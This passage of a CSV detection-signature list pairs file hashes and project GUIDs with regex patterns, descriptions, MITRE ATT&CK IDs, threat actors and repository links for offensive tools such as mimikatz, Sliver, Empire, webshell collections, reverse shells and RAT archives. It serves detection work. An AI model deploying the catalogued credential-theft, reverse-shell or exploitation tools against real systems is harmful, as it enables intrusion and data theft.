Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37271" 
"*c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63*",".{0,1000}c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37273" "*C8482002-F594-4C28-9C46-960B036540A8*",".{0,1000}C8482002\-F594\-4C28\-9C46\-960B036540A8.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","#GUIDproject","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","37274" "*c84f6dc3572924ef262bdef54962e03099ca54cab7f27cf1b9112b00c4ff95e9*",".{0,1000}c84f6dc3572924ef262bdef54962e03099ca54cab7f27cf1b9112b00c4ff95e9.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37275" 
"*c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b*",".{0,1000}c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#filehash","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","37276" "*c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e*",".{0,1000}c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","37277" "*c85c649826d3f0cb619861663dbc70669e6705eec03ddb383fc9ef92125aaf25*",".{0,1000}c85c649826d3f0cb619861663dbc70669e6705eec03ddb383fc9ef92125aaf25.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - 
T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37278" "*c861d54834fecee5b581950037912e302f14fb706c732929d7cf3e5a954fdbe1*",".{0,1000}c861d54834fecee5b581950037912e302f14fb706c732929d7cf3e5a954fdbe1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37281" "*c862cc7e0faabfff2c8e8e58cf7fca200ae534aa5f58857331d1377187a19d3a*",".{0,1000}c862cc7e0faabfff2c8e8e58cf7fca200ae534aa5f58857331d1377187a19d3a.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","37282" "*c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9*",".{0,1000}c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37283" "*c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498*",".{0,1000}c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","37284" "*c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128*",".{0,1000}c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37285" 
"*c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128*",".{0,1000}c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37286" "*c86c8f8a69c07fbec8dd650c6604bf0c9876261f*",".{0,1000}c86c8f8a69c07fbec8dd650c6604bf0c9876261f.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37287" "*c86e8448571c6b7ad352c67c4b68bdca5cfb1bcab713eba5d8f3eaa4b3e90ba1*",".{0,1000}c86e8448571c6b7ad352c67c4b68bdca5cfb1bcab713eba5d8f3eaa4b3e90ba1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation 
tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37289" "*c871b8811cc20f85aa417f598bd55d43d7ebac611c238c364c8ab41953efe321*",".{0,1000}c871b8811cc20f85aa417f598bd55d43d7ebac611c238c364c8ab41953efe321.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","37290" "*c876220ab3ebb8d45afeb7dfc23ca6a0eff57a1e323533352c089768a6c487b6*",".{0,1000}c876220ab3ebb8d45afeb7dfc23ca6a0eff57a1e323533352c089768a6c487b6.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","37291" "*c87966a280098a45c90dac27666f3f01f6b6999e7b08719a8035f1355d696ad4*",".{0,1000}c87966a280098a45c90dac27666f3f01f6b6999e7b08719a8035f1355d696ad4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","37292" "*c87b427a81ef1bd26dae10308f7e4b81e1c27a535aa17da16270c458efe51d77*",".{0,1000}c87b427a81ef1bd26dae10308f7e4b81e1c27a535aa17da16270c458efe51d77.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37293" "*c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9*",".{0,1000}c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37294" "*c8808822c7f2fb60db3809d0700f739e39dca8c3d4918d01daa696ef8ed6a819*",".{0,1000}c8808822c7f2fb60db3809d0700f739e39dca8c3d4918d01daa696ef8ed6a819.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37297" 
"*c88583cefd0d79a7db5a22290081218d5d9e2ce83de1ca17b8242f7fc74b2535*",".{0,1000}c88583cefd0d79a7db5a22290081218d5d9e2ce83de1ca17b8242f7fc74b2535.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","#filehash","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","37299" "*c887fef4396ca2a13d0696810b2ddceb2e825ac75e9a4ec0bbb9dcbd3f7d8f5c*",".{0,1000}c887fef4396ca2a13d0696810b2ddceb2e825ac75e9a4ec0bbb9dcbd3f7d8f5c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37301" "*C88D7583-254F-4BE6-A9B9-89A5BB52E679*",".{0,1000}C88D7583\-254F\-4BE6\-A9B9\-89A5BB52E679.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#GUIDproject #linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","37303" "*c88d86aee55b31827ab4782d05bd44922276955909c43c69f0fb15377cc64374*",".{0,1000}c88d86aee55b31827ab4782d05bd44922276955909c43c69f0fb15377cc64374.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37304" "*c89b7fe9c1dc0d1ad5aafcac7cdadc593bfa70c267e365a2b02df479c1ec9a0c*",".{0,1000}c89b7fe9c1dc0d1ad5aafcac7cdadc593bfa70c267e365a2b02df479c1ec9a0c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37306" "*c89d8852d0a35fe9bf532fa3da805f715527e3e38065db0cf5da7f993531f87f*",".{0,1000}c89d8852d0a35fe9bf532fa3da805f715527e3e38065db0cf5da7f993531f87f.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37307" "*c8a9514b7960c16693f6f8d9ff70fb81aee3a0d152e502782337f7dc2cd9a64b*",".{0,1000}c8a9514b7960c16693f6f8d9ff70fb81aee3a0d152e502782337f7dc2cd9a64b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - 
TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37310" "*c8ae4bec1bf8a1f63364441f766287ead235ef96c84895a62e07d9a9e7f8e6a7*",".{0,1000}c8ae4bec1bf8a1f63364441f766287ead235ef96c84895a62e07d9a9e7f8e6a7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37311" "*c8b7754a7e593daafe1fc7804731fca139ace13fdcf3842ceada5d97f0a358cf*",".{0,1000}c8b7754a7e593daafe1fc7804731fca139ace13fdcf3842ceada5d97f0a358cf.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37312" "*c8bbde78c6ad9fb5501ca1967e813836496498e0592e7ca77f7d6f9c43ef96ca*",".{0,1000}c8bbde78c6ad9fb5501ca1967e813836496498e0592e7ca77f7d6f9c43ef96ca.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","37313" "*c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617*",".{0,1000}c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - 
TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37314" "*c8c03eac6f580d5a5b06e41e3893f9addc08b3ffce06772fe997df705af91cbf*",".{0,1000}c8c03eac6f580d5a5b06e41e3893f9addc08b3ffce06772fe997df705af91cbf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37315" "*C8C12FA3-717F-4D35-B8B3-2E7F7A124E7C*",".{0,1000}C8C12FA3\-717F\-4D35\-B8B3\-2E7F7A124E7C.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","37316" "*c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219*",".{0,1000}c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37317" "*c8c9275b-4f46-4d48-9096-f0ec2e4ac8eb*",".{0,1000}c8c9275b\-4f46\-4d48\-9096\-f0ec2e4ac8eb.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 
- T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#GUIDproject","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","37318" "*C8D738E6-8C30-4715-8AE5-6A8FBFE770A7*",".{0,1000}C8D738E6\-8C30\-4715\-8AE5\-6A8FBFE770A7.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","#GUIDproject","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","37321" "*c8da2ec07d898ec888a807d390929697de0e87dccd27516dc190b37c64cb9bbe*",".{0,1000}c8da2ec07d898ec888a807d390929697de0e87dccd27516dc190b37c64cb9bbe.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37322" "*c8dcd4f55989ca974ccbf330b883606943b4cddd96049618d4f9b52bd84a444b*",".{0,1000}c8dcd4f55989ca974ccbf330b883606943b4cddd96049618d4f9b52bd84a444b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37324" "*c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090*",".{0,1000}c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37325" "*c8f180ed07a027942370c5946ad38e71f4afc3a1cd10295b415606678d9832b2*",".{0,1000}c8f180ed07a027942370c5946ad38e71f4afc3a1cd10295b415606678d9832b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37326" "*c8f3081d43f87186ea9413304d6f0edc75c4d78682a3b844f7754dbf40b4a548*",".{0,1000}c8f3081d43f87186ea9413304d6f0edc75c4d78682a3b844f7754dbf40b4a548.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","37327" "*c901499b26440e566a67a3a7f37c07fea83682c22be9bbd442de7d8590a3bb45*",".{0,1000}c901499b26440e566a67a3a7f37c07fea83682c22be9bbd442de7d8590a3bb45.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37328" "*c90614a48df0d4005091daffbab57bbe716313999b39b27dfc1038748280b68f*",".{0,1000}c90614a48df0d4005091daffbab57bbe716313999b39b27dfc1038748280b68f.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","37329" "*c909fbdc6b6254554995cef9878eb4982edaa05f545236ad78c1eb34f68020fc*",".{0,1000}c909fbdc6b6254554995cef9878eb4982edaa05f545236ad78c1eb34f68020fc.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37330" 
"*c9152451df19ff8cac70faf169055ea18b3b91eb105d722873b27da26af7b599*",".{0,1000}c9152451df19ff8cac70faf169055ea18b3b91eb105d722873b27da26af7b599.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","37332" "*C91C8B29-82DF-49C0-986B-81182CF84E42*",".{0,1000}C91C8B29\-82DF\-49C0\-986B\-81182CF84E42.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 